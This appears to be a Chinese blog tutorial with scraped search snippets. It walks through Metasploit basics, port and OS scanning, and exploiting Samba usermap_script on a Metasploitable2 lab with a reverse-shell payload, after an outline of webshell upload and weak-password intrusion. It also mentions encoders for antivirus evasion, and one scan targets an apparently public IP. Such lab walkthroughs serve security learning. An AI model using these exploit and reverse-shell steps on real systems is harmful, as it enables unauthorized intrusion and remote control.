    先扫描目录管理后台---->逐一尝试登录-------->找后台,弱口令-------->寻找网站是否有编译器,以及编译器类型------->网上搜索相关漏洞------>对编译器目录扫描------再次寻找到后台登陆界面,用弱口令尝试登陆------>寻文件上传界面------>上传小马并连接,上传大马getshell

     

    CVE等漏洞:

    简介:

    (类似于字典)

    CVE的英文全称是Common Vulnerabilities & Exposures(公共漏洞和暴露)

    如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题

    CVE兼容

    也就是一个工具、网站、数据库或者其它安全产品使用CVE名称,并与其它使用CVE命名方式的产品交叉引用。

    CVE兼容后可以实现:

    CVE查询  通过CVE名称在产品中搜索相关的信息

    CVE输出   在产品提供的信息中包括相关的CVE名称

    CVE映射  CVE的条目和产品中的信息完全对应

    原理:

    有些CVE漏洞没有被厂家所采用或修复,则可能存在相关的漏洞可利用

     (实操将会在后面更新)

    系列推荐:

    1.

    【原理】【利用过程】后端检测绕过:文件头检测、二次渲染、条件竞争、突破getmagesize()之隐写术、突破exif_imagetype()

    2. 

    【后端黑白名单绕过】【WEB 漏洞利用/原理】不懂原理都是没灵魂的方法躯壳?文件上传漏洞利用过程

    3. 

    文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试

    展开全文
  • Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞
  • MSF以及Samba漏洞利用

    千次阅读 2020-11-15 16:33:03
    文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据库二、Metasploit基础2.1专业术语2.2渗透攻击步骤三、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用...

    MSF以及Samba漏洞利用

    一、Metasploit简介

    Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。

    Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。

    攻击者可以将来自漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。

    1.1MSF启动

    在命令行输入msfconsole启动msf

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f2Bzg9A7-1605428456738)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201104132545224.png)

    1.2问题报错

    1.2.1及时更新源

    在使用Kali操作系统时应注意及时更新源,就像平时要及时更新手机App一个道理。更新命令有apt-get update、apt-get upgrede和ap-get dstupgrade.

    apt-getupdate:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。
    
    apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包
    
    apt-get dist-upgrade:升级整个Linux系统,例如从Kali Linux 1.0.1升级到Kali Linux 1.0.2 (不仅能够升级所有已安装的软件包,而且会处理升级过程中可能出现的软件冲突。某些情况下,它的部分升级过程需要人工参与)。
    
    

    1.2.2下载数据库

    apt-get install postgresql
    

    在这里插入图片描述

    systemctl start postgresql
    

    bCmunvZd-1605428387338)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201104133459464.png)]

    二、Metasploit基础

    2.1专业术语

    MSF框架由多个模块组成,各个模块及其具体的功能如下。

    1. Auxiliaries (辅助模块)

    该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

    1. Exploit (漏洞利用模块)

    漏洞利用是指由渗透测试者利用一个系统、 应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

    1. Payload (攻击载荷模块)

    攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,架中可以自由地选择。传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

    1. Post(后期渗透模块)

    该模块主要用于在取得目标系统远程控制权后,进行一系列的后法透攻击动作。如获取敏感信息、实施跳板攻击等。

    1. Encoders(编码工具模块)

    这机块在海进测试中负责免杀,以防止被系毒软件、防火墙、IDS及类似的安全软件检测出来。

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8CbefnsO-1605428387341)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201104133740286.png)]

    2.2渗透攻击步骤

    使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦察井发动攻击,大致的步骤如下所示。

    1. 扫描标机系统,寻找可用漏洞。
    2. 选择并配置一个漏洞利用模块。
    3. 选择井配置一个攻击载荷模块。
    4. 选择一个编码技术,用来绕过杀毒软件的查杀。
    5. 渗透攻击。

    三、主机扫描

    扫描和收集信息是渗透测试中的第一步, 其主要目标是尽可能多地发现有关目标机器的信息。获取的信息越多,渗透的概率就越大。该步骤的主要关注点是目标机器IP地址、可用服务、开放端口等。

    3.1使用辅助模块进行端口扫描

    3.1.1检查有哪些可用端口

    辅助模块是Metasploit,首先利用search命令来搜索有哪些可用的端口模块。

    我们可以看到可用的扫描器列表,包含了各种扫描类型

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JZ7avykb-1605428387342)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201105173258638.png)]

    3.1.2一个小问题

    Module database cache not built yet, using slow search

    很多情况下会出现如下问题:

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L2qoOQbA-1605428387344)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201104142201819.png)]

    解决办法:

    root@kali:~# msfdb init          【初始化】
    Creating database user 'msf'
    Enter password for new role: 
    Enter it again: 
    Creating databases 'msf' and 'msf_test'
    Creating configuration file in /usr/share/metasploit-framework/config/database.yml
    Creating initial database schema
    root@kali:~# service postgresql restart          【重启postgresql服务】
    root@kali:~# update-rc.d postgresql enable        【设置为开机自启动】
    root@kali:~# service postgresql status
    ● postgresql.service - PostgreSQL RDBMS
       Loaded: loaded (/lib/systemd/system/postgresql.service; enabled; vendor preset: disabled)
       Active: active (exited) since Tue 2017-08-22 03:47:39 EDT; 1min 18s ago
     Main PID: 1254 (code=exited, status=0/SUCCESS)
       CGroup: /system.slice/postgresql.service
    
    Aug 22 03:47:39 kali systemd[1]: Starting PostgreSQL RDBMS...
    Aug 22 03:47:39 kali systemd[1]: Started PostgreSQL RDBMS.
    root@kali:~# msfconsole
    
    msf > db_rebuild_cache                      【重建缓存】
    [*] Purging and rebuilding the module cache in the background...
    
    ...
    【大概要等个5分钟的样子,自己可以尝试一下运行下面那个命令】
    ...
    
    msf > search portscan         【再次搜索发现变快了很多
    

    3.1.3使用TCP扫描模块并检查有那些参数需要设置

    输入use命令即可使用该漏洞利用模块使用show options命令查看需要设置的参数

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-z8x73T4R-1605428387346)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201105174307576.png)]
    Required列中被标记为yes的参数必须包含实际的值,其中RHOSTS设置待扫描的IP地址、 PORTS 设置扫描端口范围、THREADS扫描线程,线程数量扫描的速度越多,使用 set命令设置相应的参数,也可使用unset命令取消某个参数值设置

    设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run运行。

    set RHOSTS [设置待扫描的IP地址]
    set PORTS 1-500
    set THREADS 20
    show options
    

    在这里插入图片描述

    可以看到目标机器开了21 53 443 三个个端口

    3.1.4使用unset取消某个参数

    这里取消的是ip地址,最后可看见开放了21 53端口。

    unset rhosts
    set rhosts 47.99.203.214
    run
    

    在这里插入图片描述

    另外,还有两条命令,setg和unsetg。两者用于设置或者取消全局的参数值。

    3.2使用辅助模块进行服务扫描

    在扫描目标机器上运行的服务时,有多种基于服务的扫描技术可供选择,例如 VNC、FTP、SMB等,只需执行特定类型的扫描就可以发现服务。 通过search命令搜索scanner可以发现大量的扫描模块,建议读者多尝试不同的辅 助扫描模块,了解其用法。使用的步骤与使用端口扫描模块时的基本相同,这里就不演示了,附上常用的扫描模块

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JjPUBZCt-1605428387350)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201105180218677.png)]

    3.3使用Nmap扫描

    Metasploit 中同样可以使用Nmap扫描,nmap的用法在第三章中已经详细讲过,它不仅可以用来确定目标网络上计算机的存活状态,而且可以扫描计算机的操作系统、开放端口、服务等。熟练掌握Nmap 的用法可以极大地提高个人的渗透测试技术。

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KjLGJOjx-1605428387352)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201105191501638.png)]

    3.3.1系统扫描

    现在我们要获取目标主机的操作系统,输入nmap -O -Pn/-p0 URI命令,其中Pn和 p0(数字0)参数的意思是不使用ping 的方式,而且假定所有主机系统都是活动的,可以穿透防火墙,也可以避免被防火墙发现。

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rIOyXoEZ-1605428387353)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201105192201912.png)]

    四、漏洞利用

    4.1Metasploitable2搭建

    下面就假设目标机是Metasploitable2 ,对Linux机器进行渗透攻击。Metasploitable2 虚拟系统是一个特别制作的Ubuntu操作系统,主要用于安全工具测试和演示常见的漏洞攻击。该虚拟系统兼容VMware VirtualBox和其他虚拟平台,默认只开启一 个网络适配器并且开启 NAT和 Host Only 。

    此次模拟目标机是自我搭建的metasploitable2,攻击机为kali。

    该虚拟机的默认账户和密码都是msfadmin

    然后查看一下当前的ip地址

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P0JIywHy-1605428387354)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201108142049505.png)]
    kali上对目标ip进行扫描。

    nmap -sV 192.168.18.136
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fnSXKPKB-1605428387356)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201108144034381.png)]
    收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload 从扫描结果中发现目标ip运行着Samba服务。

    4.2 Samba漏洞

    简介 Samba是一个能让Linux系统应用Microsoft网络通讯协议的软件,而SMB是Server Message Block的缩写,即为服务器消息块,SMB主要是作为Microsoft的网络通讯协议,后来Samba将SMB通信协议应用到了Linux系统上,就形成了现在的Samba软件。

    在msf种搜索samba漏洞利用模块

    search samba
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1fP10GqP-1605428387357)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201108145716129.png)]
    发现漏洞利用模块exploit/multi/samba/usermap_script,rank是 excellent,即最杰出而且时间是最新的,为提高渗透成功率,这里选择此模块进行渗透

    查看目标利用模块。

    info exploit/multi/samba/usermap_script 
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tol5PfQN-1605428387358)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201108150354304.png)]

    使用漏洞利用模块并且查看可用于攻击的payload

    use exploit/multi/samba/usermap_script 
    show payloads
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x2R9zOav-1605428387359)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201108150517233.png)]

    如图所示的命令即可查看该漏洞利用模块下可供选择的攻击载荷模块,因为目标是Linux机器,因此一定要选择Linux的攻击载荷。

    这里我们使用cmd/unix/reverse

    set payload cmd/unix/reverse
    

    在这里插入图片描述

    设置攻击的目标机的ip

    设置漏洞利用的端口号

    设置攻击机的主机ip

    set RHOST 192.168.18.136

    set RPORT 445

    set LHOST 192.168.18.139

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-75VujCQB-1605428387361)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201110115538692.png)]

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bBl7Oqig-1605428387363)(C:\Users\86188\AppData\Roaming\Typora\typora-user-images\image-20201110115607161.png)]

    展开全文
  • 简述fastbin漏洞利用

    千次阅读 2022-03-06 18:11:18
    fastbin attack 是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是: 存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞 漏洞发生于 fastbin 类型的 chunk 中 其中...
  • 漏洞利用六:Linux系统漏洞利用

    千次阅读 多人点赞 2021-09-02 16:10:04
    二、CVE-2014-6271 Bash Shellshock(破壳) Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据...
  • ECshop漏洞利用工具

    2011-11-11 11:25:09
    ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
  • Spring Boot Actuator 漏洞利用

    千次阅读 2022-04-12 14:23:12
    漏洞利用流程如下: 利用详情参考: https://www.freebuf.com/news/others/234266.html
  • Apache Tomcat 漏洞利用

    千次阅读 2021-11-29 13:41:55
    Apache Tomcat 漏洞利用 参考链接1 参考链接2 通过对apache tomcat的枚举和利用,我们可以从中找出漏洞,然后得到shell 枚举 在 Tomcat6 之前的某些版本中,我们可以使用msf枚举用户: msf> use auxiliary/...
  • 漏洞利用四:3389端口漏洞利用

    千次阅读 2021-09-02 16:06:07
    找到要利用漏洞输入编号(search命令) 3.使用要利用的攻击项(use命令) 4.查看模块配置信息(带Yes的是需要配置的):命令:show options 查看能攻击哪些系统命令:info 5.配置(set命令):Rhosts、Lhost。 6....
  • IIS短文件名泄漏漏洞利用工具下载

    热门讨论 2014-03-05 20:11:50
    利用IIS中间键.NET漏洞猜解网站目录或短文件名,好不好用试了才知道
  • Apache-shiro漏洞利用合集

    千次阅读 2022-04-15 14:19:48
    这里漏洞原理不再多进行赘述 主要是测试漏洞利用过程 漏洞1:shiro-550 CVE-2016-4437 shiro反序列化漏洞 利用版本 Apache-shiro <1.2.4 漏洞环境docker安装 docker pull medicean/vulapps:s_shiro_1 ...
  • Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了,复现漏洞来学习一下,希望可以帮助到大家 ❞ 0x01影响范围 ...
  • SRC挖掘|Cors跨域漏洞|DoraBox漏洞利用

    千次阅读 2022-04-18 14:20:17
    网站如果存在CORS跨域漏洞就会有用户敏感数据被窃取的风险 跨域资源共享(CORS)是一种浏览器机制,可实现对位于给定域外部的资源的受控访问,它扩展了同源策略(SOP)并增加了灵活性,但是,如果网站的CORS策略配置和实施...
  • 漏洞利用三:445端口漏洞利用

    千次阅读 2021-09-02 15:57:54
    445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。...2.找到要利用漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
  • 系统漏洞利用过程

    千次阅读 2020-10-21 21:01:21
    系统漏洞利用过程 1.天镜、nessus、极光等扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具(这里我以天镜,扫描本机作为一个例子) 2.开msf 通过search搜漏洞编号或漏洞名称 (这里我有一个kali和一...
  • Metasploit技术(三)——漏洞利用

    千次阅读 2022-04-07 19:56:24
    漏洞利用
  • 这是作者的网络安全自学教程系列,主要是...本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
  • 基于java环境漏洞利用

    千次阅读 2022-02-27 18:26:40
    基于java环境的漏洞利用获取shell前言二、操作步骤1.执行监听设置参数2.运行木马构建session总结 前言 一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以...
  • ms17_010漏洞利用

    千次阅读 2022-02-16 17:22:03
    漏洞原理: MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 237,688
精华内容 95,075
关键字:

漏洞利用

友情链接: Java_Test.zip